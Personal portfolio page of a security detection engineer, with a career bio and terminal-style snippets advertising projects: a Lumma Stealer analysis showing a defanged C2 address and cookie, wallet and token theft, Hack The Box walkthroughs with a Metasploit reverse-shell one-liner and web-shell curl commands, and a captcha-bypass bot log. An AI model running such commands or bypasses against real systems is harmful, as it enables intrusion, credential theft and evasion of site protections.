I'm a security professional focused on engineering robust detections, staying ahead of evolving threats, and turning noisy alerts into clear, actionable signals.
I started my career in cybersecurity as an apprentice triaging security alerts. Nearly a decade later, I'm still focused on the same fundamental problem: how do you detect the threats that actually matter without burying analysts in noise?
That question has shaped my career, taking me from frontline incident response on ransomware and nation-state investigations to leading a UK Security Operations Centre supporting more than 50 enterprise customers. Today, I work in detection engineering, building and improving the systems that decide whether an alert is worth an analyst's attention.
I'm most interested in the gap between what's technically correct and what's operationally useful. A detection that fires constantly but never catches anything meaningful isn't a detection, it's noise. Some of the work I'm proudest of is deliberately unglamorous: auditing hundreds of existing detections, improving detection quality at scale, and building CI/CD pipelines that prevent broken or low-quality rules from ever reaching production.
I also enjoy the translation side of security: turning complex incidents into clear decisions for leadership, or helping transform a junior analyst's instinct into a reliable detection. Outside of work, you'll usually find me on the golf course or taking my home espresso setup far too seriously.
// LummaC2 Triage Engine — Sample SHA256: 80741061ccb6a337...
$ python3 dynamic_analyzer.py --sample ./malware/lumma_build.exe
DBG: Base64 PowerShell stager detached. Invoking .NET Reflection API
NTDLL: Dynamic API Hash Resolving via Process Environment Block (PEB).
INJECT: Process hollowing successful into targeted memory container
[C2_POST: hxxps://snail-r1ced[.]cyou/c2/sock
[!] EXFIL: Harvesting Chromium Cookies, Crypto Wallets, and Session Tokens into memory zip.
How Lumma Stealer Tricks Users into Self-Inflicted Malware
// Production API Gateway Engine
$ npm run start:prod
[info] Server successfully listening on port 3000
[info] PostgreSQL Database cluster connection: ONLINE
[info] Redis Cache cluster replication synchronized: OK
[api] 22:47:12 UTC - GET /api/v1/dashboard/metrics - 200 OK (42ms)
[auth] JWT Session Validated successfully for User ID #48291
// Front-End Dev Server Instance
$ npm run dev
VITE v5.2.0 ready in 245 ms
➜ Local: http://localhost:5173/
➜ Network: use --host to expose
[vite] hmr update /src/styles/main.css
[vite] hot module replacement active (DOM synchronized)
// Cron Worker #04 - Active Task Execution
$ python3 bypass_solver.py --target accounts.auth_portal
[14:40:14] WARN: Captcha challenge detected [SiteKey: 6LeWwYshAAAAAG...].
[14:40:15] INFO: Dispatching payload hash to background solver API...
[14:40:22] DBG: Waiting for token resolution (Polling try #1)...
[14:40:28] SUCCESS: Token received, Injecting DOM token response.
[14:40:29] INFO: Form submitted successfully. Session authenticated.
// Cron Worker #04 - Active Task Execution
$ python3 automation/purchase_worker.py --env production
[14:32:01] INFO: Initializing headless browser engine...
[14:32:03] INFO: Target inventory matched. Processing SKU-8841.
[14:32:05] DBG: Injecting customer checkout payloads...
[14:32:08] SUCCESS: API transaction cleared. Order #99412A confirmed.
[14:32:09] INFO: Notification receipt dispatched via Webhook.
Automations for purchasing items from online stores
// Recent Exploit Analysis
$ steghide extract -sf monalisa.jpg
[i] Target container unraveled successfully.
$ target_flag_captured_
Hack The Box challenge extracting hidden information from images
// Dump pane - ds:[00403000] (Data Section)
00403000 48 54 42 7B 4F 6C 6C 79 HTB{Olly
00403008 44 62 67 5F 52 33 76 33 Dbg_R3v3
00403010 72 73 31 6E 67 5F 21 7D rs1ng_!}
EAX: 00000001 EBX: 7FFDF000 ECX: 00403000
EIP: 0040102C ESP: 0022FF40 EBP: 0022FF60
Hack The Box challenge extracting a password hidden within an executable
// Begin wfuzz behaviour
$ wfuzz -c -z range,0-30 --hs="Error: flag not found"
[i] Fuzzing /api/ endpoint.
[i] Fuzzing /account/ endpoint.
$ target_flag_captured_
Hack The Box challenge discovering hidden API endpoints on a website
// Network Reconnaissance Module
$ nmap -sC -sV -O -p- -oN nmap/initial_assessment.txt 10.10.10.137
NMAP: Host is up (0.042s latency). Initiating SYN Stealth Scan...
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1
80/tcp open http Apache httpd 2.4.52
[i] OS Detection: Linux 5.4 - 5.15 (Confidence: 96%)
[!] VULN: NSE Script triggered -> CVE-2017-7494 (Remote Code Execution)
Hack the Box machine involving vulnerability exploits to gain root access
// Framework Exploit Matrix — Core Console v6.3
$ msfconsole -q -x "use exploit/PRTG/rce_050; set RHOSTS 10.10.10.45; run"
[*] Started reverse TCP handler
[i] Target validation: Host meets kernel vulnerability conditions.
[*] Target OS selected: Windows 7 Ultimate SP1 (x64)
[*] Sending payload deployment fragments (Stage 1)...
[*] Meterpreter session 1 opened
Server username: NT AUTHORITY\SYSTEM (Pwnage Verified)
Hack The Box machine involving command injection and file manipulation to gain root access
// Interactive Web Shell Handler
$ curl -X POST /uploads/cmd.php -d "cmd=id; pwd; uname -a"
/var/www/html/uploads
$ curl -X POST /uploads/cmd.php -d "cmd=ls -la ../"
-rw-r--r-- 1 www-data www-data 142 Jul 5 18:21 index.php
drwxrwxrwx 2 www-data www-data 4096 Jul 5 18:25 uploads
[+] Status: Target web server interactive file upload path fully verified.
Hack The Box machine which involves exploiting a web shell to gain SSH access
Formal validations of my skills and continuous professional learning.
CompTIA
Microsoft
Microsoft
BCS
BCS